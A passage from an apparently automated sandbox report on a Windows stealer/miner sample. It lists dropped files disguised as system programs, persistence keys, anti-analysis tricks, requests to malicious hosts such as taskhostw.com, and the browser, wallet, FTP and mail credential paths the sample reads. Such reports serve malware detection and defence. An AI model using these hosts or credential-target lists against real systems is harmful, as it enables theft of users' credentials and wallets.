  1215.  
  1216.  
  1217. "self_read": "process: scaner.exe, pid: 6000, offset: 0x003ba1bb, length: 0x00020556"
  1218.  
  1219.  
  1220. "self_read": "process: scaner.exe, pid: 6000, offset: 0x003de171, length: 0x00018e16"
  1221.  
  1222.  
  1223. "self_read": "process: scaner.exe, pid: 6000, offset: 0x003f9be7, length: 0x00000032"
  1224.  
  1225.  
  1226. "self_read": "process: scaner.exe, pid: 6000, offset: 0x003fa339, length: 0x00000030"
  1227.  
  1228.  
  1229. "self_read": "process: scaner.exe, pid: 6000, offset: 0x003faae9, length: 0x00000031"
  1230.  
  1231.  
  1232. "self_read": "process: scaner.exe, pid: 6000, offset: 0x003fc64a, length: 0x001425b5"
  1233.  
  1234.  
  1235. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00543c1f, length: 0x00000035"
  1236.  
  1237.  
  1238. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00546204, length: 0x00000035"
  1239.  
  1240.  
  1241. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00548e09, length: 0x00000035"
  1242.  
  1243.  
  1244. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0054b8ce, length: 0x00000035"
  1245.  
  1246.  
  1247. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0054e863, length: 0x00000035"
  1248.  
  1249.  
  1250. "self_read": "process: scaner.exe, pid: 6000, offset: 0x005511c8, length: 0x00000035"
  1251.  
  1252.  
  1253. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0055384d, length: 0x00000035"
  1254.  
  1255.  
  1256. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00555d42, length: 0x00000035"
  1257.  
  1258.  
  1259. "self_read": "process: scaner.exe, pid: 6000, offset: 0x005584b7, length: 0x00000035"
  1260.  
  1261.  
  1262. "self_read": "process: scaner.exe, pid: 6000, offset: 0x0055b04c, length: 0x00000033"
  1263.  
  1264.  
  1265. "self_read": "process: scaner.exe, pid: 6000, offset: 0x005626bf, length: 0x00000034"
  1266.  
  1267.  
  1268. "self_read": "process: scaner.exe, pid: 6000, offset: 0x005644b3, length: 0x0002cd4d"
  1269.  
  1270.  
  1271. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00593620, length: 0x00000037"
  1272.  
  1273.  
  1274. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00593e17, length: 0x00000032"
  1275.  
  1276.  
  1277. "self_read": "process: scaner.exe, pid: 6000, offset: 0x005947d9, length: 0x00000030"
  1278.  
  1279.  
  1280. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00594f09, length: 0x00000032"
  1281.  
  1282.  
  1283. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00596aab, length: 0x00000030"
  1284.  
  1285.  
  1286. "self_read": "process: scaner.exe, pid: 6000, offset: 0x005970db, length: 0x0004765a"
  1287.  
  1288.  
  1289. "self_read": "process: scaner.exe, pid: 6000, offset: 0x005e2f35, length: 0x00000032"
  1290.  
  1291.  
  1292. "self_read": "process: scaner.exe, pid: 6000, offset: 0x005e6fb7, length: 0x00000030"
  1293.  
  1294.  
  1295. "self_read": "process: scaner.exe, pid: 6000, offset: 0x005e8d07, length: 0x00000032"
  1296.  
  1297.  
  1298. "self_read": "process: scaner.exe, pid: 6000, offset: 0x005ec3e9, length: 0x00000032"
  1299.  
  1300.  
  1301. "self_read": "process: scaner.exe, pid: 6000, offset: 0x005ef10b, length: 0x00000030"
  1302.  
  1303.  
  1304. "self_read": "process: scaner.exe, pid: 6000, offset: 0x005f1acb, length: 0x00000032"
  1305.  
  1306.  
  1307. "self_read": "process: scaner.exe, pid: 6000, offset: 0x005f211d, length: 0x00000030"
  1308.  
  1309.  
  1310. "self_read": "process: scaner.exe, pid: 6000, offset: 0x005f26ad, length: 0x0000002f"
  1311.  
  1312.  
  1313. "self_read": "process: scaner.exe, pid: 6000, offset: 0x005f5d5c, length: 0x00088810"
  1314.  
  1315.  
  1316. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00683b6c, length: 0x0000a3e8"
  1317.  
  1318.  
  1319. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00693104, length: 0x00000032"
  1320.  
  1321.  
  1322. "self_read": "process: scaner.exe, pid: 6000, offset: 0x00696006, length: 0x00018f21"
  1323.  
  1324.  
  1325. "self_read": "process: scaner.exe, pid: 6000, offset: 0x006b6207, length: 0x0000003c"
  1326.  
  1327.  
  1328. "self_read": "process: scaner.exe, pid: 6000, offset: 0x006b6303, length: 0x00000036"
  1329.  
  1330.  
  1331. "self_read": "process: scaner.exe, pid: 6000, offset: 0x006b6389, length: 0x0000002d"
  1332.  
  1333.  
  1334.  
  1335.  
  1336. "Description": "A process created a hidden window",
  1337. "Details":
  1338.  
  1339. "Process": "taskhostw.exe -> C:\\Windows\\System32\\cmd.exe"
  1340.  
  1341.  
  1342. "Process": "wscript.exe -> C:\\Programdata\\Windows\\install.bat"
  1343.  
  1344.  
  1345. "Process": "wscript.exe -> pause.bat"
  1346.  
  1347.  
  1348.  
  1349.  
  1350. "Description": "Drops a binary and executes it",
  1351. "Details":
  1352.  
  1353. "binary": "C:\\Programdata\\WindowsTask\\scaner.exe"
  1354.  
  1355.  
  1356. "binary": "C:\\ProgramData\\Windows\\winit.exe"
  1357.  
  1358.  
  1359. "binary": "C:\\ProgramData\\install\\taskhostw.exe"
  1360.  
  1361.  
  1362.  
  1363.  
  1364. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  1365. "Details":
  1366.  
  1367. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  1368.  
  1369.  
  1370. "suspicious_request": "http://ih1667924.myihor.ru/index.php"
  1371.  
  1372.  
  1373. "suspicious_request": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D"
  1374.  
  1375.  
  1376. "suspicious_request": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCECsuburZdTZsFIpu26N8jAc%3D"
  1377.  
  1378.  
  1379. "suspicious_request": "http://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBR64T7ooMQqLLQoy%2BemBUYZQOKh6QQUkK9qOpRaC9iQ6hJWc99DtDoo2ucCEQD%2BofQtYJP0vg6JS%2B4x27Bg"
  1380.  
  1381.  
  1382. "suspicious_request": "http://taskhostw.com/randomx/STATUS.html"
  1383.  
  1384.  
  1385. "suspicious_request": "http://taskhostw.com/randomx/loaderTOP.html"
  1386.  
  1387.  
  1388. "suspicious_request": "http://taskhostw.com/randomx/Login.html"
  1389.  
  1390.  
  1391. "suspicious_request": "http://taskhostw.com/randomx/Password.html"
  1392.  
  1393.  
  1394. "suspicious_request": "http://taskhostw.com/randomx/Server.html"
  1395.  
  1396.  
  1397. "suspicious_request": "http://taskhostw.com/randomx/configCPUX.html"
  1398.  
  1399.  
  1400.  
  1401.  
  1402. "Description": "Performs some HTTP requests",
  1403. "Details":
  1404.  
  1405. "url": "http://ip-api.com/json"
  1406.  
  1407.  
  1408. "url": "http://ih1667924.myihor.ru/index.php"
  1409.  
  1410.  
  1411. "url": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D"
  1412.  
  1413.  
  1414. "url": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCECsuburZdTZsFIpu26N8jAc%3D"
  1415.  
  1416.  
  1417. "url": "http://ocsp.comodoca.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBR64T7ooMQqLLQoy%2BemBUYZQOKh6QQUkK9qOpRaC9iQ6hJWc99DtDoo2ucCEQD%2BofQtYJP0vg6JS%2B4x27Bg"
  1418.  
  1419.  
  1420. "url": "http://taskhostw.com/randomx/STATUS.html"
  1421.  
  1422.  
  1423. "url": "http://taskhostw.com/randomx/loaderTOP.html"
  1424.  
  1425.  
  1426. "url": "http://taskhostw.com/randomx/Login.html"
  1427.  
  1428.  
  1429. "url": "http://taskhostw.com/randomx/Password.html"
  1430.  
  1431.  
  1432. "url": "http://taskhostw.com/randomx/Server.html"
  1433.  
  1434.  
  1435. "url": "http://taskhostw.com/randomx/configCPUX.html"
  1436.  
  1437.  
  1438.  
  1439.  
  1440. "Description": "The binary likely contains encrypted or compressed data.",
  1441. "Details":
  1442.  
  1443. "section": "name: .rsrc, entropy: 8.00, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00a18000, virtual_size: 0x00a17f50"
  1444.  
  1445.  
  1446.  
  1447.  
  1448. "Description": "A process attempted to delay the analysis task by a long amount of time.",
  1449. "Details":
  1450.  
  1451. "Process": "taskkill.exe tried to sleep 420 seconds, actually delayed analysis time by 0 seconds"
  1452.  
  1453.  
  1454. "Process": "rutserv.exe tried to sleep 926 seconds, actually delayed analysis time by 0 seconds"
  1455.  
  1456.  
  1457. "Process": "netsh.exe tried to sleep 3540 seconds, actually delayed analysis time by 0 seconds"
  1458.  
  1459.  
  1460. "Process": "WmiPrvSE.exe tried to sleep 1260 seconds, actually delayed analysis time by 0 seconds"
  1461.  
  1462.  
  1463.  
  1464.  
  1465. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  1466. "Details":
  1467.  
  1468. "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 7256816 times"
  1469.  
  1470.  
  1471. "Spam": "rutserv.exe (3784) called API GetSystemTimeAsFileTime 65535 times"
  1472.  
  1473.  
  1474. "Spam": "rfusclient.exe (2896) called API GetSystemTimeAsFileTime 65535 times"
  1475.  
  1476.  
  1477.  
  1478.  
  1479. "Description": "Steals private information from local Internet browsers",
  1480. "Details":
  1481.  
  1482. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  1483.  
  1484.  
  1485. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  1486.  
  1487.  
  1488. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  1489.  
  1490.  
  1491. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  1492.  
  1493.  
  1494. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  1495.  
  1496.  
  1497. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  1498.  
  1499.  
  1500. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  1501.  
  1502.  
  1503. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  1504.  
  1505.  
  1506. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  1507.  
  1508.  
  1509. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  1510.  
  1511.  
  1512. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  1513.  
  1514.  
  1515. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  1516.  
  1517.  
  1518. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  1519.  
  1520.  
  1521. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  1522.  
  1523.  
  1524. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  1525.  
  1526.  
  1527. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  1528.  
  1529.  
  1530. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  1531.  
  1532.  
  1533. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  1534.  
  1535.  
  1536. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  1537.  
  1538.  
  1539.  
  1540.  
  1541. "Description": "Network activity contains more than one unique useragent.",
  1542. "Details":
  1543.  
  1544. "Process": "Exes_a83fb348f3b803d1dd92946e8dcf0e8c.rar"
  1545.  
  1546.  
  1547. "User-Agent": "AutoIt"
  1548.  
  1549.  
  1550. "Process": "taskhostw.exe"
  1551.  
  1552.  
  1553. "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)"
  1554.  
  1555.  
  1556. "Process": "taskhostw.exe"
  1557.  
  1558.  
  1559. "User-Agent": "FTP"
  1560.  
  1561.  
  1562. "Process": "taskhostw.exe"
  1563.  
  1564.  
  1565. "User-Agent": "FTP Client"
  1566.  
  1567.  
  1568.  
  1569.  
  1570. "Description": "Installs itself for autorun at Windows startup",
  1571. "Details":
  1572.  
  1573. "service name": "RManService"
  1574.  
  1575.  
  1576. "service path": "C:\\ProgramData\\Windows\\rutserv.exe"
  1577.  
  1578.  
  1579. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Realtek HD Audio"
  1580.  
  1581.  
  1582. "data": "C:\\ProgramData\\RealtekHD\\taskhostw.exe"
  1583.  
  1584.  
  1585. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Realtek HD Audio"
  1586.  
  1587.  
  1588. "data": "C:\\ProgramData\\RealtekHD\\taskhostw.exe"
  1589.  
  1590.  
  1591. "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\RManService\\ImagePath"
  1592.  
  1593.  
  1594. "data": "C:\\ProgramData\\Windows\\rutserv.exe"
  1595.  
  1596.  
  1597.  
  1598.  
  1599. "Description": "Collects information about installed applications",
  1600. "Details":
  1601.  
  1602. "Program": "Google Update Helper"
  1603.  
  1604.  
  1605.  
  1606.  
  1607. "Program": "Microsoft Excel MUI 2013"
  1608.  
  1609.  
  1610. "Program": "Microsoft Outlook MUI 2013"
  1611.  
  1612.  
  1613.  
  1614.  
  1615. "Program": "Google Chrome"
  1616.  
  1617.  
  1618. "Program": "Adobe Flash Player 29 NPAPI"
  1619.  
  1620.  
  1621. "Program": "Adobe Flash Player 29 ActiveX"
  1622.  
  1623.  
  1624. "Program": "Microsoft DCF MUI 2013"
  1625.  
  1626.  
  1627. "Program": "Microsoft Access MUI 2013"
  1628.  
  1629.  
  1630. "Program": "Microsoft Office Proofing Tools 2013 - English"
  1631.  
  1632.  
  1633. "Program": "Adobe Acrobat Reader DC"
  1634.  
  1635.  
  1636. "Program": "Microsoft Publisher MUI 2013"
  1637.  
  1638.  
  1639. "Program": "Microsoft Office Shared MUI 2013"
  1640.  
  1641.  
  1642. "Program": "Microsoft Office OSM MUI 2013"
  1643.  
  1644.  
  1645. "Program": "Microsoft InfoPath MUI 2013"
  1646.  
  1647.  
  1648. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  1649.  
  1650.  
  1651. "Program": "Outils de v\\xc3\\xa9rification linguistique 2013 de Microsoft Office\\xc2\\xa0- Fran\\xc3\\xa7ais"
  1652.  
  1653.  
  1654. "Program": "Microsoft Word MUI 2013"
  1655.  
  1656.  
  1657. "Program": "Microsoft OneDrive"
  1658.  
  1659.  
  1660. "Program": "Microsoft Groove MUI 2013"
  1661.  
  1662.  
  1663. "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xc3\\xb1ol"
  1664.  
  1665.  
  1666.  
  1667.  
  1668. "Program": "Microsoft Access Setup Metadata MUI 2013"
  1669.  
  1670.  
  1671. "Program": "Microsoft Office OSM UX MUI 2013"
  1672.  
  1673.  
  1674. "Program": "Java Auto Updater"
  1675.  
  1676.  
  1677. "Program": "Microsoft PowerPoint MUI 2013"
  1678.  
  1679.  
  1680. "Program": "Microsoft Office Professional Plus 2013"
  1681.  
  1682.  
  1683. "Program": "Adobe Refresh Manager"
  1684.  
  1685.  
  1686. "Program": "Microsoft Office Proofing 2013"
  1687.  
  1688.  
  1689. "Program": "Microsoft Lync MUI 2013"
  1690.  
  1691.  
  1692.  
  1693.  
  1694. "Program": "Microsoft OneNote MUI 2013"
  1695.  
  1696.  
  1697.  
  1698.  
  1699. "Description": "Creates a hidden or system file",
  1700. "Details":
  1701.  
  1702. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low"
  1703.  
  1704.  
  1705. "file": "C:\\Windows\\System32\\drivers\\etc\\hosts"
  1706.  
  1707.  
  1708. "file": "C:\\ProgramData\\Microsoft\\Intel\\R8.exe"
  1709.  
  1710.  
  1711. "file": "C:\\ProgramData\\Microsoft\\Intel\\taskhost.exe"
  1712.  
  1713.  
  1714. "file": "C:\\ProgramData\\Microsoft\\Intel\\wini.exe"
  1715.  
  1716.  
  1717. "file": "C:\\ProgramData\\Microsoft\\Check\\Check.txt"
  1718.  
  1719.  
  1720. "file": "C:\\ProgramData\\Microsoft\\Check"
  1721.  
  1722.  
  1723. "file": "C:\\ProgramData\\Microsoft\\Intel"
  1724.  
  1725.  
  1726. "file": "C:\\ProgramData\\Microsoft\\temp"
  1727.  
  1728.  
  1729. "file": "C:\\ProgramData\\install"
  1730.  
  1731.  
  1732. "file": "C:\\ProgramData\\install\\del.bat"
  1733.  
  1734.  
  1735. "file": "C:\\ProgramData\\lsass.exe"
  1736.  
  1737.  
  1738. "file": "C:\\ProgramData\\kz.exe"
  1739.  
  1740.  
  1741. "file": "C:\\ProgramData\\script.exe"
  1742.  
  1743.  
  1744. "file": "C:\\ProgramData\\lsass2.exe"
  1745.  
  1746.  
  1747. "file": "C:\\ProgramData\\olly.exe"
  1748.  
  1749.  
  1750. "file": "C:\\Windows\\boy.exe"
  1751.  
  1752.  
  1753. "file": "C:\\Windows\\svchost.exe"
  1754.  
  1755.  
  1756. "file": "C:\\Windows\\NetworkDistribution"
  1757.  
  1758.  
  1759. "file": "C:\\ProgramData\\WindowsTask\\winlogon.exe"
  1760.  
  1761.  
  1762. "file": "C:\\ProgramData\\WindowsTask\\scaner.dat"
  1763.  
  1764.  
  1765. "file": "C:\\ProgramData\\WindowsTask\\scaner.exe"
  1766.  
  1767.  
  1768. "file": "C:\\ProgramData\\RunDLL"
  1769.  
  1770.  
  1771. "file": "C:\\ProgramData\\WindowsTask\\audiodg.exe"
  1772.  
  1773.  
  1774. "file": "C:\\ProgramData\\RealtekHD\\taskhostw.exe"
  1775.  
  1776.  
  1777. "file": "C:\\ProgramData\\WindowsTask\\MicrosoftHost.exe"
  1778.  
  1779.  
  1780. "file": "C:\\ProgramData\\Windows\\install.bat"
  1781.  
  1782.  
  1783. "file": "C:\\ProgramData\\Windows\\install.vbs"
  1784.  
  1785.  
  1786. "file": "C:\\ProgramData\\Windows\\reg1.reg"
  1787.  
  1788.  
  1789. "file": "C:\\ProgramData\\Windows\\reg2.reg"
  1790.  
  1791.  
  1792. "file": "C:\\ProgramData\\Windows\\rfusclient.exe"
  1793.  
  1794.  
  1795. "file": "C:\\ProgramData\\Windows\\rutserv.exe"
  1796.  
  1797.  
  1798. "file": "C:\\ProgramData\\Windows\\vp8decoder.dll"
  1799.  
  1800.  
  1801. "file": "C:\\ProgramData\\Windows\\vp8encoder.dll"
  1802.  
  1803.  
  1804. "file": "C:\\ProgramData\\RealtekHD"
  1805.  
  1806.  
  1807. "file": "C:\\ProgramData\\WindowsTask"
  1808.  
  1809.  
  1810. "file": "C:\\ProgramData\\Windows"
  1811.  
  1812.  
  1813. "file": "C:\\Programdata\\Windows\\install.bat"
  1814.  
  1815.  
  1816. "file": "C:\\Programdata\\Windows\\install.vbs"
  1817.  
  1818.  
  1819. "file": "C:\\Programdata\\Windows\\reg1.reg"
  1820.  
  1821.  
  1822. "file": "C:\\Programdata\\Windows\\reg2.reg"
  1823.  
  1824.  
  1825. "file": "C:\\Programdata\\Windows\\rfusclient.exe"
  1826.  
  1827.  
  1828. "file": "C:\\Programdata\\Windows\\rutserv.exe"
  1829.  
  1830.  
  1831. "file": "C:\\Programdata\\Windows\\vp8decoder.dll"
  1832.  
  1833.  
  1834. "file": "C:\\Programdata\\Windows\\vp8encoder.dll"
  1835.  
  1836.  
  1837. "file": "C:\\Programdata\\Windows"
  1838.  
  1839.  
  1840.  
  1841.  
  1842. "Description": "Attempts to identify installed AV products by installation directory",
  1843. "Details":
  1844.  
  1845. "file": "C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Free 18.0.0\\avp.exe"
  1846.  
  1847.  
  1848. "file": "C:\\Program Files\\Kaspersky Lab\\Microsoft Security Client\\MsMpEng"
  1849.  
  1850.  
  1851. "file": "C:\\Program Files\\Kaspersky Lab\\Microsoft Security Client\\MsMpEng"
  1852.  
  1853.  
  1854.  
  1855.  
  1856. "Description": "Retrieves Windows ProductID, probably to fingerprint the sandbox",
  1857. "Details":
  1858.  
  1859.  
  1860. "Description": "File has been identified by 36 Antiviruses on VirusTotal as malicious",
  1861. "Details":
  1862.  
  1863. "MicroWorld-eScan": "AIT:Trojan.Nymeria.2285"
  1864.  
  1865.  
  1866. "FireEye": "Generic.mg.a83fb348f3b803d1"
  1867.  
  1868.  
  1869. "CAT-QuickHeal": "Trojan.GenericPMF.S4165517"
  1870.  
  1871.  
  1872. "McAfee": "Artemis!A83FB348F3B8"
  1873.  
  1874.  
  1875. "Cybereason": "malicious.8f3b80"
  1876.  
  1877.  
  1878. "Arcabit": "Trojan.Generic.D1E8521E"
  1879.  
  1880.  
  1881. "Symantec": "ML.Attribute.HighConfidence"
  1882.  
  1883.  
  1884. "ESET-NOD32": "BAT/Qhost.NUQ"
  1885.  
  1886.  
  1887. "APEX": "Malicious"
  1888.  
  1889.  
  1890. "ClamAV": "Win.Malware.Delf-6957976-0"
  1891.  
  1892.  
  1893. "Kaspersky": "Trojan-PSW.Win32.Delf.aidq"
  1894.  
  1895.  
  1896. "BitDefender": "AIT:Trojan.Nymeria.2285"
  1897.  
  1898.  
  1899. "NANO-Antivirus": "Trojan.Win32.Stealer.fitdqk"
  1900.  
  1901.  
  1902. "Ad-Aware": "AIT:Trojan.Nymeria.2285"
  1903.  
  1904.  
  1905. "Sophos": "Mal/Generic-S"
  1906.  
  1907.  
  1908. "Comodo": "Malware@#2kbg7x930unyo"
  1909.  
  1910.  
  1911. "F-Secure": "Trojan.TR/AD.MoksSteal.cnlr"
  1912.  
  1913.  
  1914. "DrWeb": "BAT.KillAV.9"
  1915.  
  1916.  
  1917. "Invincea": "heuristic"
  1918.  
  1919.  
  1920. "McAfee-GW-Edition": "BehavesLike.Win32.Generic.vc"
  1921.  
  1922.  
  1923. "Trapmine": "malicious.high.ml.score"
  1924.  
  1925.  
  1926. "Emsisoft": "AIT:Trojan.Nymeria.2285 (B)"
  1927.  
  1928.  
  1929. "Avira": "TR/AD.MoksSteal.cnlr"
  1930.  
  1931.  
  1932. "Antiy-AVL": "TrojanRansom/Win32.Blocker"
  1933.  
  1934.  
  1935. "Microsoft": "Trojan:Win32/Gandcrab!rfn"
  1936.  
  1937.  
  1938. "Endgame": "malicious (high confidence)"
  1939.  
  1940.  
  1941. "ZoneAlarm": "Trojan-PSW.Win32.Delf.aidq"
  1942.  
  1943.  
  1944. "Acronis": "suspicious"
  1945.  
  1946.  
  1947. "MAX": "malware (ai score=80)"
  1948.  
  1949.  
  1950. "TrendMicro-HouseCall": "Coinminer_CryptoNight.SM-WIN64"
  1951.  
  1952.  
  1953. "Rising": "Trojan.Win32/64.XMR-Miner!1.ADCC (CLASSIC)"
  1954.  
  1955.  
  1956. "Ikarus": "Trojan.BAT.Qhost"
  1957.  
  1958.  
  1959. "MaxSecure": "Trojan.Malware.300983.susgen"
  1960.  
  1961.  
  1962. "GData": "Generic.Application.CoinMiner.1.7D03E886 (2x)"
  1963.  
  1964.  
  1965. "Panda": "Trj/CI.A"
  1966.  
  1967.  
  1968. "Qihoo-360": "HEUR/QVM10.1.2451.Malware.Gen"
  1969.  
  1970.  
  1971.  
  1972.  
  1973. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  1974. "Details":
  1975.  
  1976.  
  1977. "Description": "Attempts to modify proxy settings",
  1978. "Details":
  1979.  
  1980.  
  1981. "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
  1982. "Details":
  1983.  
  1984. "target": "clamav:Win.Malware.Delf-6957976-0, sha256:5bd2d341093fe91785282b2b35a685981135148a749f59cf6744f228acd8f561, type:PE32 executable (GUI) Intel 80386, for MS Windows"
  1985.  
  1986.  
  1987. "dropped": "clamav:Win.Malware.Delf-6957976-0, sha256:4f0721744cd810f06e05feb2663d060be066c40fd63ed517a350d75a6beb27f3 , guest_paths:C:\\ProgramData\\install\\taskhostw.exe, type:PE32 executable (GUI) Intel 80386, for MS Windows"
  1988.  
  1989.  
  1990. "dropped": "clamav:Win.Malware.Delf-6957976-0, sha256:d9f03cb5456019159160cf66cea176ae41c43a30232eb8aca13b5af071dd80e0 , guest_paths:C:\\Users\\user\\AppData\\Local\\Temp\\aut2736.tmp, type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
  1991.  
  1992.  
  1993.  
  1994.  
  1995. "Description": "Modifies system policies to prevent the launching of specific applications or executables",
  1996. "Details":
  1997.  
  1998.  
  1999. "Description": "Attempts to disable UAC",
  2000. "Details":
  2001.  
  2002.  
  2003. "Description": "Attempts to disable Windows Defender",
  2004. "Details":
  2005.  
  2006.  
  2007. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  2008. "Details":
  2009.  
  2010. "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallets\\wallet.dat"
  2011.  
  2012.  
  2013. "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallets\\wallet.dat"
  2014.  
  2015.  
  2016. "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallet.dat"
  2017.  
  2018.  
  2019. "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallets\\wallet.dat"
  2020.  
  2021.  
  2022. "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallet.dat"
  2023.  
  2024.  
  2025. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallets\\wallet.dat"
  2026.  
  2027.  
  2028. "file": "C:\\Users\\user\\AppData\\Roaming\\wallets\\wallet.dat"
  2029.  
  2030.  
  2031. "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallets\\wallet.dat"
  2032.  
  2033.  
  2034. "file": "C:\\Users\\user\\AppData\\wallets\\wallet.dat"
  2035.  
  2036.  
  2037. "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallet.dat"
  2038.  
  2039.  
  2040. "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallets\\wallet.dat"
  2041.  
  2042.  
  2043. "file": "C:\\Users\\user\\AppData\\wallet.dat"
  2044.  
  2045.  
  2046. "file": "C:\\Users\\user\\AppData\\Roaming\\wallet.dat"
  2047.  
  2048.  
  2049. "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallet.dat"
  2050.  
  2051.  
  2052. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallet.dat"
  2053.  
  2054.  
  2055. "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallet.dat"
  2056.  
  2057.  
  2058. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\*"
  2059.  
  2060.  
  2061.  
  2062.  
  2063. "Description": "Harvests credentials from local FTP client softwares",
  2064. "Details":
  2065.  
  2066. "file": "C:\\Users\\user\\AppData\\Roaming\\filezilla\\recentservers.xml"
  2067.  
  2068.  
  2069.  
  2070.  
  2071. "Description": "Harvests information related to installed instant messenger clients",
  2072. "Details":
  2073.  
  2074. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  2075.  
  2076.  
  2077.  
  2078.  
  2079. "Description": "Harvests information related to installed mail clients",
  2080. "Details":
  2081.  
  2082. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
  2083.  
  2084.  
  2085. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
  2086.  
  2087.  
  2088. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
  2089.  
  2090.  
  2091. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
  2092.  
  2093.  
  2094. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
  2095.  
  2096.  
  2097. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
  2098.  
  2099.  
